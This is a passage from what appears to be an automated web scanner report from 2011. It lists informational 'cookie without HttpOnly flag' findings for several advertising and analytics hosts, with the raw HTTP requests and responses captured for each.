User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; _msaId=d8678782_61_15534038; _FP=; _HOP=; MUID=E361C23374E642C998D8ABA7166A75EC; OrigMUID=E361C23374E642C998D8ABA7166A75EC%2c7f2206b9bd64464bac0097685f7b8444; _SS=SID=7E86734B014B497982A1A3998AE3B12B&CW=1065&CH=723; SRCHD=MS=1865664&SM=1&D=1769857&AF=BMMENO

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&RedC=c.bing.com&MXFR=E361C23374E642C998D8ABA7166A75EC
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=E361C23374E642C998D8ABA7166A75EC&TUID=1; domain=.bing.com; expires=Sat, 04-Feb-2012 14:24:20 GMT; path=/;
Date: Tue, 19 Jul 2011 14:24:20 GMT
Content-Length: 0


14.45. http://c.microsoft.com/trans_pixel.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.microsoft.com
Path:   /trans_pixel.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trans_pixel.asp?source=www&TYPE=PV&p=worldwide&URI=%2fworldwide%2fdefault.aspx&GUID=1F4FC18C-F71E-47FB-8FC9-612F8EE59C61&r=http%3a%2f%2fwww.microsoft.com%2fworldwide&lc=en-us HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/worldwide/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078488618:ss=1311077969178; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.NumberOfVisits=3&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=70&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MS0=e2380e0986da4be1b66f0ac9e9764ae5; domain=.microsoft.com; expires=Tue, 19-Jul-2011 15:58:34 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
Date: Tue, 19 Jul 2011 15:28:33 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

14.46. http://cdnt.meteorsolutions.com/api/setid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/setid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/setid?parent_fbid=&application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=nSlUkQ8r7Lb HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; meteor_server_a71be9da-385a-45ab-b672-9d67c538b004=a71be9da-385a-45ab-b672-9d67c538b004%3C%3EB5nUnLnLLMn%3C%3E9uMSzSBW7pb%3C%3E%3C%3Ehttp%253A%2F%2Faz10143.vo.msecnd.net%2Fweb%2Foie9%2Findex_tyie9A.html%2523fbid%253D9uMSzSBW7pb%2526wom%253Dfalse; meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EnSlUkQ8r7Lb%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Tue, 19 Jul 2011 15:16:53 GMT
Content-Type: image/gif
Connection: close
P3P: CP="NID DSP ALL COR"
Etag: "2daeaa8b5f19f0bc209d976c02bd6acb51b00b0a"
Content-Length: 43
Set-Cookie: uid=0ad1f409-c147-4bb9-a425-2684ee1031f7; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/

GIF89a.............!.......,...........D..;

14.47. http://cdnt.meteorsolutions.com/api/track  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/track?application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=nSlUkQ8r7Lb&parent_fbid=&referrer=&location=http%3A%2F%2Fwww.discoverbing.com%2F&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; meteor_server_a71be9da-385a-45ab-b672-9d67c538b004=a71be9da-385a-45ab-b672-9d67c538b004%3C%3EB5nUnLnLLMn%3C%3E9uMSzSBW7pb%3C%3E%3C%3Ehttp%253A%2F%2Faz10143.vo.msecnd.net%2Fweb%2Foie9%2Findex_tyie9A.html%2523fbid%253D9uMSzSBW7pb%2526wom%253Dfalse; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Tue, 19 Jul 2011 15:16:53 GMT
Content-Type: application/javascript
Connection: close
P3P: CP="NID DSP ALL COR"
Etag: "0ab6932a09770d21174fc4740c4ea6797459b1b2"
Content-Length: 133
Set-Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EnSlUkQ8r7Lb%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/
Set-Cookie: uid=0ad1f409-c147-4bb9-a425-2684ee1031f7; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/

meteor.json_query_callback({"parent_id": "", "id": "nSlUkQ8r7Lb", "uid": "0ad1f409\\x2Dc147\\x2D4bb9\\x2Da425\\x2D2684ee1031f7"}, 0);

14.48. http://clk.atdmt.com/goiframe/213439054/340524297/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /goiframe/213439054/340524297/direct/01

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/213439054/340524297/direct/01 HTTP/1.1
Host: clk.atdmt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PVM/iview/340524297/direct/01?click=http://clk.specificclick.net/click/v=5;m=3;l=24555;c=159320;b=985192;ts=20110719164416;dct=
Cookie: AA002=1297100700-4279215; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; MUID=3957719BE8F34A5DA51D204E7E06704A; ach00=ceda/2b295:66c2/2b7b2; ach01=d61e38e/2b295/1397f116/ceda/4e1f7328:d550fc1/2b7b2/13ebac86/66c2/4e1f736e

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=ceda/2b295:66c2/2b7b2:8bff/2a019; expires=Thursday, 18-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=d61e38e/2b295/1397f116/ceda/4e1f7328:d550fc1/2b7b2/13ebac86/66c2/4e1f736e:cb8d24e/2a019/144bfd09/8bff/4e25ecbb; expires=Thursday, 18-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Tue, 19 Jul 2011 20:44:42 GMT
Connection: close


14.49. http://clk.specificclick.net/click/v=5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.specificclick.net
Path:   /click/v=5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/v=5;m=3;l=24555;c=159320;b=985192;ts=20110719164416;dct=http://t.atdmt.com HTTP/1.1
Host: clk.specificclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PVM/iview/340524297/direct/01?click=http://clk.specificclick.net/click/v=5;m=3;l=24555;c=159320;b=985192;ts=20110719164416;dct=
Cookie: ug=WPTUOuwXp9NyRD

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Set-Cookie: ug=WPTUOuwXp9NyRD; Domain=.specificclick.net; Expires=Sun, 17-Jul-2016 20:44:45 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://t.atdmt.com
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 168
Date: Tue, 19 Jul 2011 20:44:45 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://t.atdmt.com">here</a>.<p>
</body>
</html>

14.50. http://d.agkn.com/pixel!t=650!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.agkn.com
Path:   /pixel!t=650!

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel!t=650!?ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&che=8001782&uuid=2473514405220909223&camid=5645623&plaid=65809089&creid=42836554&adgid=243054557 HTTP/1.1
Host: d.agkn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: uuid=636735553077172289; u=6|0BAgVsetHAAAQAAEBACcCAtPdQQLT2IEBAlB9AeUAAAAAA%2BwqvwAAAAACj9l3AAAAAA58t6QBagIABDCfAAQwtAA%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=636735553077172289; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 17-Jul-2016 20:44:49 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BAgVuKlBAAAgAAMBACcCAtPdRgLT2IYBAlB9AeUAAAAAA%2BwqwQAAAAACjaJKAAAAAA58t90BagIABDCfAAQwtAA%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 18-Jul-2013 20:44:49 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"43-1308732886000"
Last-Modified: Wed, 22 Jun 2011 08:54:46 GMT
Content-Type: image/gif
Content-Language: en-US
Content-Length: 43
Date: Tue, 19 Jul 2011 20:44:49 GMT
Connection: close

GIF89a.............!.......,...........D..;

14.51. http://de.ign.com/js.ng/size=728x90&network=tpn&property=gamestop&dechannel=gs_home&pagetype=gs_channel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.ign.com
Path:   /js.ng/size=728x90&network=tpn&property=gamestop&dechannel=gs_home&pagetype=gs_channel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/size=728x90&network=tpn&property=gamestop&dechannel=gs_home&pagetype=gs_channel HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix)
AdServer: deserver25.in.snowball.com:9678:4
P3P: policyref="http://adserver.ign.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMi TAIi PSAa PSDa IVAa IVDa CONi OUR SAMa UNRa PUBi OTRa IND UNI PUR COM NAV PRE"
Pragma: no-cache
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=0
Expires: Tue, 19 Jul 2011 16:02:27 GMT
Date: Tue, 19 Jul 2011 16:02:27 GMT
Content-Length: 1152
Connection: close
Set-Cookie: NGUserID=a016c05-17584-1686947025-5; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

document.write('<!-- TYPE=leaderboard -->\n<!-- SIZE -->\n<!-- STYLE=img -->\n<a target=\"_blank\" href=\"http://de.ign.com/event.ng/Type=click&FlightID=165328&AdID=192829&TargetID=30097&Targets=2903
...[SNIP]...

14.52. http://ehg-aaa.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-aaa.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550120M4ND07EN3&cd=1&hv=6&n=/home.aspx&con=&vcon=/en-nne/Pages&tt=auto&ja=y&dt=14&zo=300&lm=1311102271000&bn=Netscape&ce=y&ss=1920*1200&sc=24&sv=13&cy=u&hp=u&ln=en-US&vpc=HBX0140s&vjs=HBX0150.01s&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&lv.id=&lv.pos=&ttt=lid,lpos&ra=&rf=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pl=Mozilla%20Default%20Plug-in%3AJava%28TM%29%20Platform%20SE%206%20U26%3AJava%20Deployment%20Toolkit%206.0.260.3%3AWPI%20Detector%201.3%3A&hid=0.7788128023153735 HTTP/1.1
Host: ehg-aaa.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com
Cookie: CTG=1310995053; WSS_GW=V1z%X%r^^QrCr

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:04:40 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%X%%%rBB@^; path=/; domain=.hitbox.com; expires=Wed, 18-Jul-2012 19:04:40 GMT; max-age=31536000
Set-Cookie: CTG=1311102280; path=/; domain=.hitbox.com; expires=Tue, 26-Jul-2011 19:04:40 GMT; max-age=604800
Set-Cookie: DM550120M4NDV6=V1r@(#X"rz%X%%%rBB@^eer%@ez%zrz%"%X%%%rBB@^z%X%%%rBB@^"%X%%%rBBir"%X%%%rBB@^eer%@e"%z(xB$aTxB[TTaxB$YIWaFxB$O:maxB(IFGKz7}z)OuKr6%rrzA6aT"TTa6YIWaF6O:ma|IFGK; path=/; domain=ehg-aaa.hitbox.com; expires=Wed, 18-Jul-2012 19:04:40 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Tue, 19 Jul 2011 19:04:41 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.53. http://g-pixel.invitemedia.com/gmatcher  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /gmatcher

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gmatcher?id=CAESEBL6QfFdOZBFuwKtr4mXcyc&cver=1 HTTP/1.1
Host: g-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fsharethis.com%2Fprivacy&jsref=&rnd=1311085721255
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1308705121+ \"4\": 1305981633}"; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"318445\": [1310644253+ \"Th7YGwAJYV4K7GUs0lMuuA==\"+ 129398+ 75015+ 1685]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"609953\": [1310644252+ \"Th7YGgAJ5ZgK7GTR1UIraQ==\"+ 129395+ 75015+ 1685]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"678237\": [1309235299+ \"6199351355498244314\"+ 4483+ 2534+ 2]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1309951300+ \"ThRFQQAEG8YK5TlPHdsIpA==\"+ 63083+ 25140+ 6119]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuFY/59JgFFi7obfH1gUGDVObgLSBowWYD6XDMftqyxA2TlQ2RNQWTCfS4Tj/mI2ASaJI10XgbIMGgwGDBYMQNGJy1iBepo3LUURfTuRTYBD4vEGVNFZM9iAapvWoorOfQwy4fqdJSiiK+aDRL81taKIrgG6n0niGZpo7wKQuS1nn75HFn09ESR68OF1FNHJ70HmXmjYjCL6eyFIdC6a6N2XoPCY8aEBRXQn0GVZEp/eI4uKcsz8wSLQyiyx6DSq8K6vLAITGSXOLf//Dll4FtCMa4wSV17+e4ds9NkXrALMEvue3kMR/fgK7LhdF1BEZ20Eid76fhAhCgCI44aO"; io_freq_p1="eJzjEuf4YSPAIjF3w+8PLAoMGgwGTBZzQGwuYY6DCQJMEke6LkIlGCwYgIJ9YQKMEs2blqIILokX4JR4vAFV8GU8UGXTWlTBOxFAwet3liAJinBsCxU4yCTxrakVRemyBKDSlrNP3yMLPo4BCl5o2IwieCEUKDgXTfBpAFBwxoeG98g2/QgUaGWWWHQaVfRWoMBERolzy/+/QzZgc4wAs8S+p/dQBI+C7J+76wKKYHc4UPDW94MIQQCXP1h1"; segments_p1="eJwtUk1LAlEUJWcWr1nNT+kH9BPaF7Rr16J+QxpCSRJYLbIvJosgyvyCPqSgEs2GSqiotIwgCyOpMWgCTbvn0OZw5tz7zj3vvjF05aQ1Q1czSeDZj0ew3OwQfN2F8lKEEqoAa88eQ1Obw0ansgbMte2Yo4tq80xOaoZqT+rm5eF0HXowh+5Wr9AUTbK0XW6Cz9fAE/vgC1RWvRiXdT3iHhkw9/7d3xso3vHo+JgmjnklkMN3/RxH1i+Aty76TnmLk2fwfBDzvX0SKxPXzKgVdnURYsO4zws6zoLA8BS88jxjV8GdT+BBg8jbLTrgqTa4jzPuOW+W1e8ElLcG5rV7JP9jv7ngyzL/RAWq1S30mCZ3BTTbHF2gSYzbudpC1WYM6wZY5dVL7FlhmEwAZ91f8Ai3NtrqEPvXIaE7UchPJcjXCfBFbuaEeUfbyBFXiJREcYTyh6zQUCW/bj40/Qyc4qS4wwQHwEqS70M9lAZ+8UeY68Irc5NBmtWWIEdMoRvsLroQAoNCAxy6VQCGj/COLWQpj2t/J9q2Gw=="; partnerUID=eyIxMTUiOiBbIjRkY2U4YTUzMDUwOGIwMmQiLCB0cnVlXSwgIjE1IjogWyIwMDQwMDMwMDE0MDAwMDA0NDk4NzIiLCB0cnVlXSwgIjE5MSI6IFsiODQ5NjUzMDYzOTI1MzI1NTgwNiIsIHRydWVdLCAiMTEzIjogWyJGUVdXQzJWSzJEV0YiLCB0cnVlXSwgIjg0IjogWyJGejYrRVMvYzk5TzZ6NU9CIiwgdHJ1ZV19

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 14:28:38 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 19-Jul-2011 14:28:18 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMzN119; Domain=invitemedia.com; expires=Wed, 18-Jul-2012 14:28:38 GMT; Path=/
Content-Length: 43

